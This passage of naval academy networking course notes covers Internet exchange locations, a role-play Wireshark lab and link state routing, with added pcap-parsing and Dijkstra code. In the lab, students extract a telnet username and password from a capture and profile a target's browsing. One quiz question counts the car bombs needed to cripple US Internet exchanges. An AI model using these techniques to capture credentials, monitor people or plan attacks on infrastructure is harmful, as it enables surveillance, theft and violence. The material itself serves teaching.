decentralized so that it could survive a nuclear war. Stated another way, the original intent was that the Internet would have
no routers serving as choke points that could serve as single points of failure. If—the theory went—every router is connected
to the same number of other routers, then every router is equally unimportant to the survival of the Internet. So, with this vision
in mind, we might expect the number of "routers per square mile" to be roughly the same.
This is not how things turned out, to say the least. The Internet has, in fact, physical focal points—single buildings where a
large number of routers are collocated—single buildings where a large amount of the Internet's traffic funnels through.
To see how this came about, let's go waaaaaay back to 1980. A USNA grad was President, disco was dying out, and the
Internet (then called the ARPANET) looked like this:
In 1980 the listing of everyone on the Internet totaled 5000 names. These were names, not computers. The number of
computers with Internet access was far fewer.
In the mid-1980's the Internet (i.e., ARPANET) shifted to TCP/IP. In 1990 the ARPANET was retired and the Internet, as
such, was then run by the National Science Foundation, and renamed NSFNET. The National Science Foundation decided that
the NSFNET should only be accessed by lofty high-minded academics, and not by grungy businesses that are out to make a
seedy profit by providing services to the unwashed masses. As a result of the National Science Foundation's Acceptable Use
Policy, businesses found they were not permitted to connect to each other by using the NSFNET.
What to do? What to do? Businesses decided to bypass the NSFNET and directly connect to each other! If Business A wanted
to connect to Business B, the solution was to run a physical cable between a router in Business A's network to an intermediate
router, and run a cable from a router in Business B's network to this same intermediate router. The only problem, then, was to
find a location where one of Business A's routers and one of Business B's routers could be placed adjacent to this intermediate
router. Once all three routers are collocated, running the two cables to connect Business A and Business B would be easy.
Along came a company named MFS. MFS purchased a building, installed a very expensive (very capable) router and advertised
itself as Metropolitan Area Exchange-East (MAE-East). MFS basically advertised: "Bring your router to MAE-East, and we
will connect your router to our central router (thus connecting everyone's routers together)." The response to this advertisement
was overwhelming: Companies showed up at MAE-East, Internet Service Providers showed up at MAE-East—basically,
anyone who wanted to interconnect to others showed up at MAE-East. By 1997, half of the Internet's traffic went through
MAE-East.
The surprising thing is that MAE-East is not a logical location that exists in theory. MAE-East is the fifth floor of 8100 Boone
Boulevard in Tysons Corner Virginia (with equipment overflowing into an adjacent parking garage). The original notion of
the Internet being geographically distributed and spread-out was over; there were now just a few chokepoints through which
all the Internet's traffic passed.
[Photo labels: McDonald's; MAE-East. Caption: 1997: 50% of Internet traffic goes through the fifth floor of this building.]
NSFNET eventually dissolved and sold off its components, and the Internet in turn evolved into a collection of independent
networks—termed autonomous systems—all interconnected to each other through locations such as MAE-East. Today, in
fact, the Internet is a collection of about 42,000 independent networks (again—autonomous systems is the proper term),
interconnected to each other.
But we are getting a little ahead of ourselves—let's go back to the 1990's! In the late 1990's, organizations decided that it was
technologically better to directly connect their autonomous systems to each other without a middleman router (such as that
provided in MAE-East). Digital Equipment Corporation purchased a building at 529 Bryant Street in Palo Alto California,
christened it the Palo Alto Internet Exchange (PAIX) and advertised: "Bring a router connected to your autonomous system to
529 Bryant Street, and we will directly connect it to other autonomous systems in our building." By 2000, PAIX was the
Internet's main connectivity hub. 529 Bryant Street? What's that you ask? That would be this nondescript building:
[Photo caption: "Gee. What a nice building. I wonder what goes on inside?"]
Surprisingly, even today this unremarkable building remains one of the Internet's most critical locations, one of the few major
key connectivity nodes. Another key focal point, where various autonomous systems are connected together is MAE-West at
55 Market Street in San Jose. By some estimates, a third of the nation's Internet traffic goes through this single building:
The surprising point bears emphasizing: There exists a discrete set of geographic locations through which a large percentage
of the Internet's traffic is funneled. More examples: Almost all Internet traffic between North and South America travels
through a building at address 50 N.E. Ninth Street, Miami, FL. You might be happy to know that in recent years the Internet
has moved back to the East coast! One of the main Internet focal points today is the Equinix campus in Ashburn Virginia near
Dulles Airport:
While it is true that the Internet of today is decentralized in terms of control (no one independent autonomous system is able to
control another independent autonomous system), it is decidedly not decentralized in terms of geography. There are, in fact,
many geographic choke points of great connectivity.
In summary, today there are approximately 42,000 autonomous systems (networks) connected together to form the Internet.
The locations where these autonomous systems are connected together (those beautiful buildings we have shown pictures of)
are termed Internet Exchanges. These Internet Exchanges allow networks to connect directly to each other. The street
addresses for these Internet Exchanges are readily accessible. See, for example, the Internet Exchange map published by
TeleGeography located here:
http://www.internetexchangemap.com/
Question 1: How many Internet exchanges are within 100 miles of Washington, D.C.?
Question 2: What is the address for the Internet Exchange located in Milwaukee?
Journalist Andrew Blum describes a visit he made to this building (the address you gave in your answer to Question 2) with a
colleague named Jon Auer in 2011:
A sleepy-eyed guard sat listlessly behind a worn-out desk in the empty lobby. Auer nodded in her direction and led
us down a narrow tiled passageway to the basement... Auer pointed to a steel box tucked into a dark corner, its LED
lights blinking away. This was the main access point for Milwaukee's municipal data network, connecting libraries,
schools and government offices. "All this talk about Homeland Security, but look what someone could do in here with
a chainsaw".
Question 3: There are 68 Internet exchanges in the United States. If you had a small terrorist army and wanted to
cripple the United States by obliterating its Internet connectivity, how many well-placed car bombs would you need
(to the nearest 100)?
There must be some other reason why we showed you pictures of those pretty buildings, right?
Well, besides being critical security weak spots, these buildings became very popular locations for small NSA field offices
following the attacks on September 11, 2001. In his bestseller The Shadow Factory, James Bamford details how the NSA
went to these various Internet Exchanges in the United States, and installed taps at the main interconnections. In this way, the
NSA was able to monitor what amounted to, roughly, ALL Internet traffic.
Question 4: If you worked for the NSA and wanted to install taps on the Internet to monitor all Internet traffic, how
many locations would you need to visit (to the nearest hundred)?
The issues involving the invasion of privacy suffered by everyday Americans through the NSA's tapping of traffic at the Internet
Exchanges remains controversial to this day.
Part II: Your NSA Internship!
CONGRATULATIONS! You have been selected for a summer NSA internship! How exciting! You are now meeting your
new boss!
[Cartoon] Eric: "Well hello there! Welcome aboard! I'm Eric. What is your name?" … "I'm sorry… what did you say your first name was?" … "Ok… welcome aboard, Midshipman!"
Your boss Eric tells you that the NSA suspects a midshipman living in Bancroft Hall (where else?) is allied with a terrorist
group. The midshipman's last name is Roy and the NSA has been tapping into his Internet traffic for some time through a tap
at MAE-East. You will be asked to analyze several captures of MIDN Roy's traffic using the Wireshark program. In fact, you
are given three tasks. Again, it is difficult to contain the excitement, and we again congratulate you.
Task 1: Capturing a password
Eric tells you that the first capture of MIDN Roy’s Internet traffic is located in the file telnetdata.pcap. The NSA
suspects that this packet capture contains MIDN Roy’s use of a Telnet session. Telnet is a networking protocol that provides
communication to a remote server. Many Telnet servers require the user to enter a username and password to access the service,
and the NSA is hoping you can extract MIDN Roy’s username and password from the file. The NSA suspects that MIDN Roy
is using the IP address 192.168.1.7.
Start up VMware Workstation and power-on your Cyber2 VM. Then launch Wireshark by selecting:
Applications > Internet > Wireshark (as root)
Under File, Click Open and highlight the file named telnetdata.pcap as shown below
And then hit Open.
Recall that MIDN Roy has the IP address 192.168.1.7. The very first packet (Packet 1) is a DNS request. Recall that DNS is
used to determine the IP address for a given URL. In other words, if we give DNS a website address such as www.foxnews.com,
DNS will tell us that the IP address is 23.15.7.144.
So, in the very first line of the capture (we will call this "packet 1" although, technically, this is not a packet…it's a packet
inside an Ethernet frame) we see that MIDN Roy is trying to find the IP address for a website. What website might this be?
Look in the Info field of Line 1 in the Packet List pane, and look at the Domain Name System Query information in the middle
pane (the Packet Details pane).
Question 5. What website is MIDN Roy attempting to find the IP address for?
Packet 2 is the DNS reply to the DNS request in packet 1.
Question 6. What is the IP address that corresponds to the website that MIDN Roy is accessing?
MIDN Roy is attempting to establish a telnet session with the server located at the IP address you provided in Question 6 above.
Let's focus on just the telnet packets by entering telnet in the filter field as shown below and then hitting Enter:
Now, we are attempting to determine the username and password that MIDN Roy entered in order to logon to the remote server.
So, we wish to concentrate only on the packets that have MIDN Roy’s IP address (192.168.1.7) as a source. Click the Source
field to order the packets by IP address:
You should now see this:
Notice the packets are no longer in sequence; the first packet listed is packet 7… this is the first TELNET packet sent by MIDN
Roy.
To examine the Telnet data, concentrate on the middle pane (the Packet Details Pane) and click the arrow next to Telnet for the
first listed packet (which is packet number 7). You should see:
So, you notice that for the very first Telnet packet sent from MIDN Roy, he is telling the remote server to please echo back (Do
Echo) what he types, so that he sees it on his screen as he is typing. For information (although it does not apply to this particular
packet), \r is the escape sequence for carriage return back to the beginning of the same line and \r\n moves us to the
beginning of the next line. (Some Unix variants interpret \n as a line feed without a carriage return; hence we often will use
"Carriage Return Line Feed" as \r\n).
Examine the Telnet data for each of these packets.
Question 7: What username is MIDN Roy using?
Question 8: What password is MIDN Roy using?
So, you know the password that MIDN Roy uses for this one specific site. But…check out this recent short news item:
http://www.reuters.com/article/2014/08/05/us-cybercrime-breach-russia-idUSKBN0G52HS20140805
Question 9: What use might it be to know MIDN Roy’s password for this one specific site?
Task 2: Capturing a search term
Eric has just returned from the Bolshoi Ballet and he is very proud of your work in Task 1. He has now given you a second
packet capture obtained by snooping on MIDN Roy. This second packet capture is located in the file secondcapture.pcap.
In Wireshark, close the file you were working on, and open the file secondcapture.pcap. Clear the Filter if you see that
it is still set to telnet.
Question 10. How many packets are in this capture?
You are told: "Analyze this packet capture." What do you do? So many packets. So little time. You know from the prior
packet analysis that the user has IP address 192.168.1.7, so you hit the Source IP address field to order the packets by IP
address:
Question 11. Is MIDN Roy’s old IP address (192.168.1.7) listed?
You ask a fellow intern what to do, and he says that he heard that it is sometimes a good idea to see all the conversations that
have gone on in the packet capture.
Let's select Statistics => Conversation List => IPv4 as shown below:
Question 12. How many separate conversations are taking place in this packet capture?
So… which of these IP addresses correspond to MIDN Roy? To answer this, look at the third column that says Packets.
This lists how many packets have been sent between the two endpoints for that line. For example, in the picture below, we see
that 2 packets were sent between IP addresses 10.52.49.232 and 224.0.0.1.
So… if this is indeed a packet capture from MIDN Roy, then it stands to reason that MIDN Roy should have been doing the
most talking…i.e., sending or receiving the most packets.
So… focusing on the conversations that involved the most packets (the bottom of the list), we should be able to determine
MIDN Roy’s IP address.
Question 13. What would be your guess about MIDN Roy’s IP address?
Question 14. Given your answer above (MIDN Roy’s IP address), which IP address does MIDN Roy seem to be
communicating with the most?
Verify your answers to Questions 13 and 14 with your instructor or lab tech before proceeding!
So… who owns this IP address that MIDN Roy is communicating with? Glad you asked! IP addresses in North America and
Canada are assigned by the American Registry for Internet Numbers. Let's go to their website:
https://www.arin.net/
and, in the Search Whois box at the upper-right (see picture below for the location), enter the IP address that MIDN Roy is
communicating with (which was your answer to Question 14):
Question 15. Who owns this IP address?
Does this corporation sound familiar? Go to the Wikipedia page for Wikipedia (i.e., go to Wikipedia, and then enter the search
term "Wikipedia"). Review the summary shown on the right sidebar of the webpage.
Question 16. Who owns Wikipedia?
Question 17. To summarize, in this packet capture that you are examining, where is MIDN Roy spending most of his
time?
So, let's focus on the packets that are sent from MIDN Roy to this particular website. Let's click on the Destination header:
and then scroll down to the first packet that is from MIDN Roy to this IP address we are interested in.
You recall from SI110 that webpages are retrieved using the GET command. Let's focus just on the packets that are from
MIDN Roy, to the website of interest, that use the GET command (which, if used, will appear as the word GET in the Info
field).
Question 18. How many packets do you need to focus on—How many packets have MIDN Roy’s IP address as the
Source, have the target's IP address as the Destination, and have the word GET appearing as the first item in the Info
field?
Question 19. Okay, time to put all your cyber skills to use! What are the two terms that MIDN Roy searched for on
Wikipedia? Hint: Look for "search=" somewhere in the string following the word GET in the Info field.
Task 3: Capturing browsing history
Eric has just returned from lunch with the Russian ambassador and he is thrilled with the work you have done. He has given
you a third packet capture from MIDN Roy and has asked you to analyze the capture to determine the websites where MIDN
Roy has been spending his time.
You are given a packet capture named webtraffic.pcap. Your goal is to determine three distinct websites that MIDN
Roy has visited.
In Wireshark, close the file you were working on, and open the file webtraffic.pcap. Click on the No field (i.e., the
leftmost field) if necessary so that the first packet listed is Packet 1.
Question 20. What is the time duration of this packet capture?
Question 21. How many total packets were captured?
Select Statistics => Summary.
Question 22. How many total bytes are in this packet capture?
Question 23. On average, how many bytes per second were captured?
This is just a packet capture from one midshipman!
Question 24. Let's say there are 1 billion people on line. If they generate traffic at approximately the same rate as
MIDN Roy, what is the total Internet traffic generated (in bytes) per second?
Question 25. Using this value, how many bytes of Internet traffic are generated per day?
Note that the printed collection of the U.S. Library of Congress is estimated to be 10^13 bytes.
Question 26. If the NSA is vacuuming up all of the Internet's data, can the data actually be used… or is there simply
too much data for anyone, even the NSA, to make sense of?
Question 27. Looking at the TCP Conversations Statistics => Conversation List => IPv4 , guess
MIDN Roy’s IP address.
Verify your answer to Questions 27 with your instructor or lab tech before proceeding!
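Task 2 and Task 3 read the conversation list and the capture summary (packet count, byte count, duration, bytes per second) off Wireshark's Statistics menus. As an added example, not part of the notes or of the exercise files, the following Python builds a small pcap file from constructed Ethernet/IPv4 frames and then derives those same figures directly from the pcap format, which is what Wireshark does behind the menu. Only 192.168.1.7 is taken from the exercise; every other address, all timestamps and the zero-padded payloads are constructed, and the parser assumes the classic little-endian microsecond pcap layout.

```python
import struct
import ipaddress
from collections import Counter

PCAP_MAGIC = 0xA1B2C3D4       # classic libpcap, microsecond timestamps
IPV4_ETHERTYPE = 0x0800
ETH_HDR_LEN = 14


def build_frame(src_ip, dst_ip, payload_len):
    """Constructed Ethernet/IPv4 frame: real headers, zero padding instead of a
    TCP segment, so the capture parses but carries no application data."""
    payload = b"\x00" * payload_len
    ip_hdr = struct.pack("!BBHHHBBH4s4s",
                         0x45, 0, 20 + len(payload), 1, 0, 64, 6, 0,
                         ipaddress.IPv4Address(src_ip).packed,
                         ipaddress.IPv4Address(dst_ip).packed)
    eth_hdr = (bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb")
               + IPV4_ETHERTYPE.to_bytes(2, "big"))
    return eth_hdr + ip_hdr + payload


def build_pcap(records):
    """Serialize (timestamp, frame) pairs into a pcap byte string."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, 1)
    for ts, frame in records:
        sec = int(ts)
        usec = int(round((ts - sec) * 1_000_000))
        out += struct.pack("<IIII", sec, usec, len(frame), len(frame)) + frame
    return out


def parse_pcap(data):
    """Yield (timestamp, src_ip, dst_ip, frame_len) for every IPv4 frame."""
    (magic,) = struct.unpack_from("<I", data, 0)
    if magic != PCAP_MAGIC:
        raise ValueError("only little-endian microsecond pcap files are handled")
    offset = 24                                   # skip the global header
    while offset + 16 <= len(data):
        sec, usec, incl_len, _orig_len = struct.unpack_from("<IIII", data, offset)
        offset += 16
        frame = data[offset:offset + incl_len]
        offset += incl_len
        (ethertype,) = struct.unpack_from("!H", frame, 12)
        if ethertype != IPV4_ETHERTYPE:
            continue                              # ARP, IPv6, ... are skipped here
        src = str(ipaddress.IPv4Address(frame[ETH_HDR_LEN + 12:ETH_HDR_LEN + 16]))
        dst = str(ipaddress.IPv4Address(frame[ETH_HDR_LEN + 16:ETH_HDR_LEN + 20]))
        yield sec + usec / 1_000_000, src, dst, len(frame)


def summary(data):
    """The numbers behind Statistics => Summary (Questions 20 to 23)."""
    pkts = list(parse_pcap(data))
    total_bytes = sum(p[3] for p in pkts)
    duration = pkts[-1][0] - pkts[0][0] if pkts else 0.0
    return {"packets": len(pkts), "bytes": total_bytes, "duration": duration,
            "bytes_per_second": total_bytes / duration if duration > 0 else 0.0}


def conversations(data):
    """Packets per unordered endpoint pair, busiest first (Statistics => Conversations => IPv4)."""
    counts = Counter()
    for _ts, src, dst, _n in parse_pcap(data):
        counts[tuple(sorted((src, dst)))] += 1
    return counts.most_common()


def busiest_host(data):
    """The address seen in the most packets: the heuristic Task 2 uses to guess MIDN Roy's IP."""
    per_host = Counter()
    for _ts, src, dst, _n in parse_pcap(data):
        per_host[src] += 1
        per_host[dst] += 1
    return per_host.most_common(1)[0][0]


# Constructed sample capture: 192.168.1.7 (the exercise's address for MIDN Roy)
# talks mostly to 198.51.100.10, a little to 198.51.100.20, and another host
# sends one multicast packet.  Nine frames, 0.5 s apart, 134 bytes each.
ROY, SERVER_A, SERVER_B = "192.168.1.7", "198.51.100.10", "198.51.100.20"
_flows = ([(ROY, SERVER_A)] * 3 + [(SERVER_A, ROY)] * 3
          + [(ROY, SERVER_B), (SERVER_B, ROY), ("192.168.1.9", "224.0.0.1")])
SAMPLE_PCAP = build_pcap([(1000.0 + 0.5 * i, build_frame(s, d, 100))
                          for i, (s, d) in enumerate(_flows)])

if __name__ == "__main__":
    print(summary(SAMPLE_PCAP))
    print(conversations(SAMPLE_PCAP))
    print("busiest host:", busiest_host(SAMPLE_PCAP))
```

On the sample capture the summary reports 9 packets, 1206 bytes over 4.0 seconds (301.5 bytes per second), the top conversation is 192.168.1.7 with 198.51.100.10 at 6 packets, and 192.168.1.7 is the busiest host, which is exactly the reasoning the exercise applies to find MIDN Roy's address and his most-contacted server.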
Since we want to determine the websites that MIDN Roy has visited, let's filter our display so that it shows only http packets
by entering http in the filter.
Now, click the Source header to group IP addresses together, and scroll down to where MIDN Roy’s packets start.
Now, here is what you need to do: You need to search through the GET packets to find the websites that MIDN Roy browses.
You might be saying: "AGHHH… that's a lot of GET commands"!
But… it's not so bad. Click on the very first GET packet from MIDN Roy. If you examine the GET info for this command
you will see:
We see that this host he is contacting is www.bbc.com! This provides a very good clue that one of the websites that MIDN
Roy is visiting is www.bbc.com. There, you have found one of the three websites MIDN Roy visited.
Now click the second and third GET packets. You should see that these are also from www.bbc.com.
Question 28. What are the other two sites that MIDN Roy visited in this packet capture? Note that the HTTP GET
/ HTTP/1.1 provides a good indication of an initial request to a website. Much of the traffic that follows are assorted
advertisements, tracking and monitoring sites, and related sites (e.g.: "Follow us on Facebook")
Security Exercise 14 Answer Sheet
Name:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Question 10:
Question 11:
Question 12:
Question 13:
Question 14:
Question 15:
Question 16:
Question 17:
Question 18:
Question 19:
Question 20:
Question 21:
Question 22:
Question 23:
Question 24:
Question 25:
Question 26:
Question 27:
Question 28:
Chapter 15: Routing Part II
Objectives:
(a) Describe the fundamental algorithms used to construct routing tables.
(b) Describe how a routing table is developed using link state routing.
(c) Describe how a routing table is developed using distance vector routing.
(d) Identify the relative advantages and disadvantages of link state routing and distance vector routing.
In the previous lecture we used routing tables that already existed. Armed with the knowledge of how to use routing tables, in
this lecture we discuss where those routing tables actually come from (i.e., how they are derived). Up until this point we have
talked about simple examples where one router is the only path to one network. In reality, things are much different. Often
there can be multiple paths from one network to another. The question is not just how to get from Point A to Point B, but how
to get there using a good route.
I. What is a Good Route?
1. Routing Algorithms. A routing algorithm tells a router which outgoing line an incoming packet should be placed on. For
IP packets, the routing decision is made from scratch for each packet that arrives. A routing algorithm should endeavor to
satisfy the following attributes:
 Correctness—packets should be routed to the proper destination.
 Simplicity—algorithms should be clean and simple so that packets are routed quickly to their destinations. Unwieldy
Rube Goldberg-type algorithms are to be avoided.
 Robustness—algorithms should adapt to changes in the network's topology caused by router or link failures.
 Stability—the algorithm should converge to a specific solution; packets should not be left aimlessly circulating in
loops around the network.
 Optimality—if there are multiple ways to get from Point A to Point B, the algorithm should provide the optimal path
through the network.
Routing is accomplished by routing protocols which establish routing tables in each router. The router consults its table to
determine how to route packets.
2. Networks as Graphs. To develop routing algorithms we model a computer network as a graph: the nodes of the graph are
the routers. An edge in a graph represents a communication link between two routers.
On each edge between two routers, we assign a weight. This weight might be distance, cost, queuing delay, or some other
factor of interest. Our problem: Find the path from a given source node to a destination node which minimizes the total weight.
If our weights represent:   then we are interested in:
distance                    shortest path
cost                        cheapest path
queuing delay               fastest path
3. Routing with Partial Information Routing is somewhat complicated by the fact that decisions are based on partial
information. But we encounter such situations every day. Consider driving down a road: Not every road sign lists every
destination. But, usually there is a default! (In road travel, the default is: If your destination is not listed on the sign, keep
driving straight.) When taken as a whole, routing tables (like road signs) must be consistent and complete. It is important that:
 all explicit directions correctly point to a shortest path
 all shortest paths for all destinations be explicitly noted in the tables
Note that routers make local routing decisions – i.e., they decide the next place to send a packet addressed to a specific
destination. But they must make this decision based on some understanding of the global network picture. So, each router
needs global information about the network. It is somewhat confusing, so the point bears repeating: Routers make local routing
decisions based on global information.
Recall that routing protocols establish routing tables in each router, and, as a simplification, we can say that these tables have the
following format:
Destination address
Address of the next element on the best path to the destination
When a packet shows up at a router, the router refers to the routing table to decide where to send the packet.
To get an idea of what a routing table should look like for a larger network than those we have treated up to this point, consider
the network shown below on the left. Suppose the weight of each link is one. The question is: What should the routing table
be for Router 1? The answer to this question is shown on the right.
[Figure: network of ten routers numbered 1 through 10, every link of weight one]
Routing Table for Router 1:
destination   next hop
2             2
3             3
4             2
5             3
6             3
7             3
8             3
9             3
10            2
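A table like the one above (destination, next hop, and, as in the practice problem that follows, total cost) is what a router must compute once it knows the whole weighted graph. As an added example, not from the notes, the following Python does that with Dijkstra's shortest-path algorithm for a constructed six-router network. The costs A-B = 1 and A-D = 4 match the statement of Practice Problem 15.1 below; all other links and costs are assumed for illustration and do not reproduce the figure.

```python
import heapq

# Constructed undirected network (not the figure in the notes): each router
# maps to its neighbours and the cost of the link.  A-B = 1 and A-D = 4 are
# the two costs stated in Practice Problem 15.1; the rest are assumed.
GRAPH = {
    "A": {"B": 1, "D": 4},
    "B": {"A": 1, "C": 3, "E": 2},
    "C": {"B": 3, "F": 1},
    "D": {"A": 4, "E": 1},
    "E": {"B": 2, "D": 1, "F": 4},
    "F": {"C": 1, "E": 4},
}


def shortest_paths(graph, source):
    """Dijkstra's algorithm.  Returns {router: (total_cost, previous_router)}
    for every router reachable from source (source maps to (0, None))."""
    dist = {source: 0}
    prev = {source: None}
    heap = [(0, source)]
    done = set()
    while heap:
        cost, u = heapq.heappop(heap)
        if u in done:
            continue                      # stale heap entry
        done.add(u)
        for v, w in graph[u].items():
            if cost + w < dist.get(v, float("inf")):
                dist[v] = cost + w
                prev[v] = u
                heapq.heappush(heap, (cost + w, v))
    return {r: (dist[r], prev[r]) for r in dist}


def routing_table(graph, source):
    """Build {destination: (next_hop, total_cost)}: for each destination walk
    the predecessor chain back until the router adjacent to source is found.
    That router is the next hop, which is all the table needs to store."""
    paths = shortest_paths(graph, source)
    table = {}
    for dest, (cost, _prev) in paths.items():
        if dest == source:
            continue
        hop = dest
        while paths[hop][1] != source:
            hop = paths[hop][1]
        table[dest] = (hop, cost)
    return table


def path_to(graph, source, dest):
    """The full router sequence, for checking the table against a picture."""
    paths = shortest_paths(graph, source)
    route = [dest]
    while route[-1] != source:
        route.append(paths[route[-1]][1])
    return list(reversed(route))


if __name__ == "__main__":
    print("Destination  Next Hop  Total Cost")
    for dest, (hop, cost) in sorted(routing_table(GRAPH, "A").items()):
        print(f"{dest:<12} {hop:<9} {cost}")
    print("path A -> F:", "-".join(path_to(GRAPH, "A", "F")))
```

For router A the example yields next hop B for B, C, E and F and next hop D for D; the A-to-F path is A-B-C-F with total cost 5. Note the tie for D (A-D directly and A-B-E-D both cost 4): the strict "less than" comparison keeps whichever route was found first, so a real protocol needs a deterministic tie-break rule if all routers are to agree.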
Practice Problem 15.1
Consider the network shown below, where the numbers on the edges indicate the cost of using that edge. For example, the cost
of using the link from Router A to Router B is 1, whereas the cost of using the link from Router A to Router D is 4.
[Figure: network with Routers A, B, C, D, E and F and weighted links; the A-B link costs 1 and the A-D link costs 4; diagram not reproduced]
(a) Fill in the routing table for Router A, and include the total cost.
Solution:
Destination | Next Hop | Total Cost
B           |          |
C           |          |
D           |          |
E           |          |
F           |          |
(b) If all routers have the correct routing tables, what is the path that an IP packet travels from Node A to Node F?
(Note that to state a path, you just need to state the sequence of routers encountered along the path; for example,
one possible path from Router A to Router F is A-D-E-F.)
Solution:
(c) What is the total cost of the path you selected in Part (b) above?
Solution:
II. Routing Protocols
So, now that we know what routing tables should look like, we ask the question: How do routing tables actually get put
together? You likely solved the preceding example by looking down on the network and performing a visual analysis of the
picture. Routers do not have the ability to hover over a picture of the network, and they do not have human visual skills at their
disposal for use in analyzing a diagram.
Routers use routing protocols to build their routing tables. Routing protocols are intended to:
• Communicate network topology information to each router.
• Determine how individual routers will use this information to make routing decisions (i.e., determine how individual
routers will use this information to construct routing tables like the one shown above).
We will discuss two routing methodologies: Link State Routing and Distance Vector Routing.
1. Link State Routing
A. Two key ideas:
• Each router learns the full network topology. That is, each router learns a complete picture of the network graph:
the routers, the links and the link weights.
• Knowing the complete network picture, each router independently computes the optimal routes to each destination
and constructs a routing table.
B. Learning the topology.
The first bullet above says “routers learn the full network topology.” So, in link state routing, how do routers come
to know the network topology? Here's how:
• Each router learns its neighbors’ addresses by sending "Hello" packets to which its neighbors reply.
• Each router determines the weight of each of its links. For example, if these weights represent time delays, the
routers might determine how long it takes to receive a reply, and use that as the weight. If the weight is a cost,
the router might “know” the costs associated with each link based on data entered by a network administrator.
• Each router then transmits packets that tell information about that individual router's links.
For instance, in the picture below, Router 26 sends a packet that essentially says:
[Figure: Router 26 linked to Router 18 (weight 4), Router 35 (weight 2) and Router 51 (weight 3); diagram not reproduced]
My name is Router 26
Router 18 is connected to me and the weight of the edge joining us is 4
Router 35 is connected to me and the weight of the edge joining us is 2
Router 51 is connected to me and the weight of the edge joining us is 3
Or, somewhat more formally, it transmits a packet that conveys the following table.
LSP from Router 26:
Router | Weight
18     | 4
35     | 2
51     | 3
By sending this packet, a router informs the network about the status, or state, of each of its links. Hence, this
methodology is called Link State Routing and these packets are called Link State Packets (LSPs). This info will
then be used by others to construct routing tables.
These LSPs are distributed to all other routers using "controlled flooding": When a router receives an LSP, it gives it
to all of its neighbors. A router keeps track of which LSPs it has seen, and only floods them the first time they arrive.
Now…think about this: After each router has sent its LSP, and after each LSP has circulated to all the other routers,
then does each router have a full and complete picture of the network topology? The answer is Yes!
But what then? We still don't have routing tables in each router. The answer: Each router determines the shortest
path (i.e., the path with the lowest total weight) from itself to every other node in the network by running a famous
algorithm named "Dijkstra's Algorithm". This relatively easy algorithm is covered in any Discrete Math textbook, but
will not be covered in EC310. See the box below for more information about Dijkstra's Algorithm.
It is important that the fundamental idea be understood: In link state routing:
• Each router, in its LSP, sends information about its neighbors only.
• The information in this LSP is sent to all other routers.
An Aside
Do routers really have names like 'Router 26'? Yes! In the Internet's OSPF routing
protocol, a router identifies itself to all other routers using a unique IP address
called a Router ID. Additionally, in every OSPF message a router sends it will
include its Router ID so that other routers know who originated the message
and where they can be reached. For this reason it is very important that the IP
address assigned as the Router ID is always available.
As you know, hardware (like your trusty drill rifle) is prone to failure. Therefore, a special software interface called
the loopback interface is assigned the Router ID. The loopback interface, because it is enabled in software,
is always active regardless of whether one or two hardware interfaces on a router stop working. This ensures routers can always
find each other to communicate when needed.
What are the routers talking about with each other and why do they need to communicate so often? There are a
number of internal measures routers use in order to increase efficiency and prevent unnecessary information from
clogging up the network, such as electing a Designated Router (DR) and Backup Designated Router (BDR) and
managing Link State Updates (LSU).
To learn more about OSPF, see http://www.ietf.org/rfc/rfc2328.txt.
An Aside
Because of time constraints in EC310, we just say:
Each router runs Dijkstra’s Algorithm. This is a well-known algorithm
which solves this problem (the details of which we skip).
You should know, though, that the algorithm is truly one of the all-time beauts in
network theory.
The algorithm solves the problem: Find the shortest path from Node X to every
other node in an arbitrary network where the edges have nonnegative weights associated with them. The algorithm is
not hard, but would require a full period (perhaps) to fully explain it. Many reasonably good explanations can be found
on the web.
Dijkstra's Algorithm has two interesting (non-technical) facts associated with it.
First, the algorithm was published in 1959. We realize that to the average midshipman, the year 1959 might as well be
1659, but—truth be told—1959 is really not that long ago! It is fascinating to think that the basic problem of
determining the shortest path in a network eluded the great minds throughout history—Euclid, Euler, Newton, Leibniz,
Descartes, Fermat, Hilbert—not to be discovered until 1959.
Second, the algorithm was published in a journal article that was strikingly brief. The paper presenting this earth-shattering
result was slightly over two pages long. Just two pages! Next time your History prof tells you that your
paper needs to be 10 pages to say anything of value, reply: "WRONG! Haven't you heard of Dijkstra!"
Dijkstra had a number of interesting personal idiosyncrasies. Despite the fact that he invented the field of structured
computer programming and contributed a key concept (the semaphore) to the study of operating systems, he limited
his own use of computers. Until the time he retired from academe in 2000 he wrote all his papers by hand, used only
the chalkboard for teaching, and strictly limited his computer use to web browsing and email. He passed away in 2002
at age 72.
Practice Problem 15.2
Given the following network map with the weights of edges between routers:
(a) Construct the Link State Packet (LSP) that Router C would send to Router B.
Solution:
(b) After Router G runs Dijkstra's Algorithm, what would be the optimal route from router G to router B, and what
would be the total cost of this route?
Solution:
C. Topology changes. What if a link dies? For instance, in the picture of Router 26 above, what if the link connecting
Router 18 to Router 26 should die?
In link state routing, whenever a router detects a change in the state of its links, it sends a new link state packet. Thus,
if the link connecting Router 18 to Router 26 should die, Router 26 will transmit a new LSP with the entries:
LSP from Router 26:
Router | Weight
35     | 2
51     | 3
Note that Router 18 will also detect the loss of a connection to Router 26 and transmit a new LSP as well. These new
LSPs will then propagate to all other routers via controlled flooding.
You might be wondering: Won't there now be conflicting information in the other routers? For instance, there will
now be two pieces of information from Router 26:
• The old LSP from Router 26 that had info about the link to Router 18:
LSP from Router 26:
Router | Weight
18     | 4
35     | 2
51     | 3
• and the revised LSP without info about Router 18:
LSP from Router 26:
Router | Weight
35     | 2
51     | 3
Which of these should another router in the network choose to use to build its network picture and run Dijkstra's
Algorithm?
To solve this perplexing predicament, yielding a righteous resolution to this difficult dilemma, and thus causing
midshipmen merriment, each LSP has a sequence number. That is, a Router stamps its first LSP with sequence
number 1, its second LSP with sequence number 2, and so forth. Higher sequence numbers override lower sequence
numbers. So, when other routers in the network receive a new LSP from Router 26, they will notice that it has a
higher sequence number than the previous LSP, and they will delete the previous (outdated) LSP.
Okay…each router has to send LSPs when the router first is connected to the network, and also has to send LSPs
whenever the network topology changes. Are there any other times that routers send LSPs?
The answer is Yes! All routers also send LSPs periodically, just to make sure all routers are “on the same page.”
Where is link state routing used in the Internet? The Internet’s Open Shortest Path First (OSPF) protocol uses link state routing. (Open refers to the fact that the standard is “open,” i.e., published, non-proprietary.)
